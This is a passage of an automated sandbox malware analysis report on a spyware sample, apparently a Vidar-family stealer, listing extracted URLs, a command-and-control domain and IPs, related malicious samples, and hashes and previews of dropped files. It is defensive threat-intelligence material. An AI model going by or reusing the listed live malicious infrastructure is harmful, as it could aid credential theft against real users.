                              unknown
                              https://store.steampowered.com/stats/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/steam_refunds/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDHCBGD.11.drfalse
                              • URL Reputation: safe
                              unknown
                              http://store.steampowered.com/privacy_agreemenGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/workshop/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/legal/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContGift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sqlite.org/copyright.html.Gift.pif, 0000000B.00000002.3222741041.000000000C23D000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoDHCBGD.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://arpdabl.zapto.orgEGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://steamcommunity.com/profiles/76561199747278259EGift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://store.steampowered.com/76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgAGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaGift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
IP              Domain              Country                       ASN    ASN Name                  Malicious
188.245.87.202  unknown             Iran (ISLAMIC Republic Of)    16322  PARSONLINETehran-IRANIR   false
104.102.49.249  steamcommunity.com  United States                 16625  AKAMAI-ASUS               false
38.180.132.96   arpdabl.zapto.org   United States                 174    COGENT-174US              false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1488222
Start date and time: 2024-08-05 18:54:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: lem.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@27/66@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 89
• Number of non-executed functions: 306
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: lem.exe
Time     | Type            | Description
12:54:56 | API Interceptor | 1x Sleep call for process: lem.exe modified
12:54:59 | API Interceptor | 27x Sleep call for process: Gift.pif modified
Match          | Associated Sample Name / URL | SHA 256  | Detection | Threat Name | Link   | Context
104.102.49.249 | d3d9.dll                     | Get hash | malicious | LummaC      | Browse |
               | xLauncher.exe                | Get hash | malicious | LummaC      | Browse |
               | Setup.exe                    | Get hash | malicious | LummaC, Go Injector, LummaC Stealer | Browse |
               | kMN7AGke8h.exe               | Get hash | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | Browse |
               | vdCC5gzAn6.exe               | Get hash | malicious | LummaC      | Browse |
               | BLXn1MpVdg.exe               | Get hash | malicious | LummaC      | Browse |
               | 66af531b832ee_main.exe       | Get hash | malicious | Vidar       | Browse |
               | 66af4e35e761b_doz.exe        | Get hash | malicious | Vidar       | Browse |
38.180.132.96  | 66af531b832ee_main.exe       | Get hash | malicious | Vidar       | Browse | • arpdabl.zapto.org/
               | 66af4e35e761b_doz.exe        | Get hash | malicious | Vidar       | Browse | • arpdabl.zapto.org/
               | a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe | Get hash | malicious | Vidar | Browse | • arpdabl.zapto.org/
               | 66adc1d3f237b_mine.exe       | Get hash | malicious | Vidar       | Browse | • arpdabl.zapto.org/
               | c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exe | Get hash | malicious | LummaC, Vidar | Browse | • arpdabl.zapto.org/
               | p2StQYQ4ck.exe               | Get hash | malicious | Vidar       | Browse | • arpdabl.zapto.org/
               | h3H69FhCbT.exe               | Get hash | malicious | Vidar       | Browse | • arpdabl.zapto.org/
               | file.exe                     | Get hash | malicious | Vidar       | Browse | • arpdabl.zapto.org/
Match              | Associated Sample Name / URL | SHA 256  | Detection | Threat Name | Link   | Context
arpdabl.zapto.org  | 66af531b832ee_main.exe       | Get hash | malicious | Vidar       | Browse | • 38.180.132.96
                   | 66af4e35e761b_doz.exe        | Get hash | malicious | Vidar       | Browse | • 38.180.132.96
                   | yLfAxBEcuo.exe               | Get hash | malicious | Cryptbot, Vidar, Xmrig | Browse | • 38.180.132.96
                   | a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe | Get hash | malicious | Vidar | Browse | • 38.180.132.96
                   | 66adc1d3f237b_mine.exe       | Get hash | malicious | Vidar       | Browse | • 38.180.132.96
                   | c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exe | Get hash | malicious | LummaC, Vidar | Browse | • 38.180.132.96
                   | p2StQYQ4ck.exe               | Get hash | malicious | Vidar       | Browse | • 38.180.132.96
                   | h3H69FhCbT.exe               | Get hash | malicious | Vidar       | Browse | • 38.180.132.96
steamcommunity.com | d3d9.dll                     | Get hash | malicious | LummaC      | Browse | • 104.102.49.249
                   | xLauncher.exe                | Get hash | malicious | LummaC      | Browse | • 104.102.49.249
                   | Set-Up.exe                   | Get hash | malicious | LummaC, Go Injector, LummaC Stealer | Browse | • 23.199.218.33
                   | Setup.exe                    | Get hash | malicious | LummaC, Go Injector, LummaC Stealer | Browse | • 104.102.49.249
                   | Setup.exe                    | Get hash | malicious | LummaC, Go Injector, LummaC Stealer | Browse | • 23.197.127.21
                   | kMN7AGke8h.exe               | Get hash | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | Browse | • 104.102.49.249
                   | vdCC5gzAn6.exe               | Get hash | malicious | LummaC      | Browse | • 104.102.49.249
                   | BLXn1MpVdg.exe               | Get hash | malicious | LummaC      | Browse | • 104.102.49.249
Match                   | Associated Sample Name / URL | SHA 256  | Detection | Threat Name | Link   | Context
COGENT-174US            | https://grace-barr.filemail.com/t/Fc9Dus5d | Get hash | malicious | HTMLPhisher | Browse | • 23.237.152.90
                        | YrZvEGx7oe.exe               | Get hash | malicious | Unknown     | Browse | • 154.7.10.86
                        | toeORRsgUX.exe               | Get hash | malicious | FormBook    | Browse | • 154.23.184.194
                        | Quote - V-24-TOS-082.exe     | Get hash | malicious | FormBook    | Browse | • 38.238.23.229
                        | Scanned Docs from Emnes Metal Sdn Bhd_.exe | Get hash | malicious | FormBook | Browse | • 38.12.1.29
                        | payment copy pdf.exe         | Get hash | malicious | FormBook    | Browse | • 154.41.249.2
                        | Yg4Sqy06Al.exe               | Get hash | malicious | FormBook    | Browse | • 38.47.158.160
                        | http://url4388.parishsoft.com/ls/click?upn=u001.Vpzjdhwu4OAeGaWRMrv2bG-2BoISIIiNCoMwLNb33p6s9puXP6QsXcB55N2OsZ6QIQL6ualISvA6R9yFsi3QAkMw-3D-3DXnsm_4xqsswqm6jfqRi4Z9uMkjQPQ2PkIkpXiS7DDGAZwwqNkGayHBacrLCvWB6Ugb4mkRZ3VOwT8CtgdDvVzoEhuyk6RBXBzMUCiGffZILgz6kR-2FL0nL0bxsibxsiUMijyxKfmLW891ickSrYKqWpAo9hCEcRsdCC2tujtVQQrSV8Vz2uroyKvadQlzhc4JKhA7jHhTUxKABBY7atxFYwVCPFB5me96L6dyoMp-2FtDuDTirn5yJY0-2FgMFIFSldNhOOGkWZFlvdMYsSUWRFKEWdA6MNjw9lUNWdhKLgUqvqHz9yAXZOqRQ6z8xUDj4ZDVoAP4jrKwzE6kfZ8QZJlON1P64VH3LTUAC-2F3-2Bu3E-2Bv-2F-2FvtH0U-3D | Get hash | malicious | Unknown | Browse | • 38.180.80.71
                        | 17nDkQW4tK.elf               | Get hash | malicious | Mirai       | Browse | • 38.148.41.21
                        | MenSncKnTI.exe               | Get hash | malicious | Xmrig       | Browse | • 149.102.143.109
PARSONLINETehran-IRANIR | mek_n_bat.bat                | Get hash | malicious | Unknown     | Browse | • 188.245.88.234
                        | EVnD2SuX13.elf               | Get hash | malicious | Mirai, Okiru | Browse | • 5.78.169.169
                        | docs_pdf.exe                 | Get hash | malicious | FormBook    | Browse | • 5.78.41.174
                        | SHIPPING DOCS_pdf.exe        | Get hash | malicious | FormBook    | Browse | • 5.78.41.174
                        | purchase order_pdf.exe       | Get hash | malicious | FormBook    | Browse | • 5.78.41.174
                        | exe4.bin.bak.exe             | Get hash | malicious | BlackMoon, GhostRat | Browse | • 5.78.93.88
                        | arm5-20240706-0316.elf       | Get hash | malicious | Mirai       | Browse | • 91.98.88.14
                        | botx.x86.elf                 | Get hash | malicious | Mirai       | Browse | • 91.98.39.84
                        | f9DYXBf380.elf               | Get hash | malicious | Mirai, Moobot | Browse | • 46.62.234.74
                        | http://www.instegeram.ir/    | Get hash | malicious | Unknown     | Browse | • 31.214.171.171
AKAMAI-ASUS             | d3d9.dll                     | Get hash | malicious | LummaC      | Browse | • 104.102.49.249
                        | xLauncher.exe                | Get hash | malicious | LummaC      | Browse | • 104.102.49.249
                        | Set-Up.exe                   | Get hash | malicious | LummaC, Go Injector, LummaC Stealer | Browse | • 23.199.218.33
                        | Setup.exe                    | Get hash | malicious | LummaC, Go Injector, LummaC Stealer | Browse | • 104.102.49.249
                        | 001original.eml              | Get hash | malicious | Unknown     | Browse | • 184.28.90.27
                        | FW Quote.msg                 | Get hash | malicious | HTMLPhisher | Browse | • 184.28.90.27
                        | kMN7AGke8h.exe               | Get hash | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | Browse | • 104.102.49.249
                        | https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdf | Get hash | malicious | HTMLPhisher | Browse | • 23.56.162.185
Match                            | Associated Sample Name / URL | SHA 256  | Detection | Threat Name | Link   | Context
51c64c77e60f3980eea90869b68c58a8 | 48DhuEoTcX.exe               | Get hash | malicious | Metasploit, Meterpreter | Browse | • 188.245.87.202
                                 | 66af531b832ee_main.exe       | Get hash | malicious | Vidar       | Browse | • 188.245.87.202
                                 | 66af4e35e761b_doz.exe        | Get hash | malicious | Vidar       | Browse | • 188.245.87.202
                                 | yLfAxBEcuo.exe               | Get hash | malicious | Cryptbot, Vidar, Xmrig | Browse | • 188.245.87.202
                                 | a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe | Get hash | malicious | Vidar | Browse | • 188.245.87.202
                                 | 66adc1d3f237b_mine.exe       | Get hash | malicious | Vidar       | Browse | • 188.245.87.202
                                 | gZiwLaFWES.exe               | Get hash | malicious | CobaltStrike | Browse | • 188.245.87.202
                                 | gZiwLaFWES.exe               | Get hash | malicious | CobaltStrike | Browse | • 188.245.87.202
                                 | c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exe | Get hash | malicious | LummaC, Vidar | Browse | • 188.245.87.202
                                 | setup.exe                    | Get hash | malicious | LummaC, Vidar | Browse | • 188.245.87.202
37f463bf4616ecd445d4a1937da06e19 | Update.js                    | Get hash | malicious | SocGholish  | Browse | • 104.102.49.249
                                 | KwUYLIU7Zq.exe               | Get hash | malicious | Snake Keylogger | Browse | • 104.102.49.249
                                 | SecuriteInfo.com.FileRepMalware.22992.301.exe | Get hash | malicious | Xmrig | Browse | • 104.102.49.249
                                 | Yg4Sqy06Al.exe               | Get hash | malicious | FormBook    | Browse | • 104.102.49.249
                                 | FACTUR@4#U20e3#U2462#U2463#U2461#U2463#U2461#U2464#U2464.hta | Get hash | malicious | Unknown | Browse | • 104.102.49.249
                                 | 3.exe                        | Get hash | malicious | BlackMoon, XRed | Browse | • 104.102.49.249
                                 | CV.vbs                       | Get hash | malicious | Xmrig       | Browse | • 104.102.49.249
                                 | Viz_Setup.U3.11.exe          | Get hash | malicious | Unknown     | Browse | • 104.102.49.249
Match                              | Associated Sample Name / URL | SHA 256  | Detection | Threat Name | Link   | Context
C:\ProgramData\CBKJJJDHDGDA\GDAAKK | ljwIPDSwFi.exe               | Get hash | malicious | DarkGate, MailPassView, Vidar | Browse |
                                   | jE4zclRJU2.exe               | Get hash | malicious | Vidar       | Browse |
                                   | 5CG2133F5Y_2024-04-05_12_15_35.569.zip | Get hash | malicious | Unknown | Browse |
C:\ProgramData\freebl3.dll         | Hq2NRFbvRb.exe               | Get hash | malicious | Amadey, Stealc, Vidar | Browse |
                                   | sorto.exe                    | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse |
                                   | 66af531b832ee_main.exe       | Get hash | malicious | Vidar       | Browse |
                                   | 66af4e35e761b_doz.exe        | Get hash | malicious | Vidar       | Browse |
                                   | 01Y61PeNtn.exe               | Get hash | malicious | Stealc, Vidar | Browse |
                                   | 8lGYdT47s1.exe               | Get hash | malicious | Stealc, Vidar | Browse |
                                   | jp95FFMUoh.exe               | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse |
                                   | yLfAxBEcuo.exe               | Get hash | malicious | Cryptbot, Vidar, Xmrig | Browse |
                                   | a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe | Get hash | malicious | Vidar | Browse |
                                   | 66adc1d3f237b_mine.exe       | Get hash | malicious | Vidar       | Browse |
Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 2947
Entropy (8bit): 5.120077314818075
Encrypted: false
SSDEEP: 48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
MD5: C7E301D9DD77A21C1CDBD73A63AF205C
SHA1: 715D25AA0C06B2AD162F52A8DE06FB5040C389B1
SHA-256: 239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
SHA-512: B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
Malicious: false
Preview: .<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t
Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8439810553697228
Encrypted: false
SSDEEP: 24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5: 9D46F142BBCF25D0D495FF1F3A7609D3
SHA1: 629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256: C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512: AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious: false
Preview: SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
File Type: ASCII text, with very long lines (1743), with CRLF line terminators
Category: dropped
Size (bytes): 9504
Entropy (8bit): 5.512408163813622
Encrypted: false
SSDEEP: 192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5: 1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1: 584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256: 0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512: 86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious: false
Preview: // Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1941
Entropy (8bit): 4.861537145678193
Encrypted: false
SSDEEP: 48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
MD5: 6F0056EC818D4FC20158F3FF190D6D6A
SHA1: 9E2108FE560CC2187395C5EED011559D201CE45D
SHA-256: 2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
SHA-512: 72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
Malicious: false
Preview: .<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4533
                                                                        Entropy (8bit):5.1021772201912805
                                                                        Encrypted:false
                                                                        SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                        MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                        SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                        SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                        SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1065
                                                                        Entropy (8bit):4.96984082363901
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                        MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                        SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                        SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                        SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                        Malicious:false
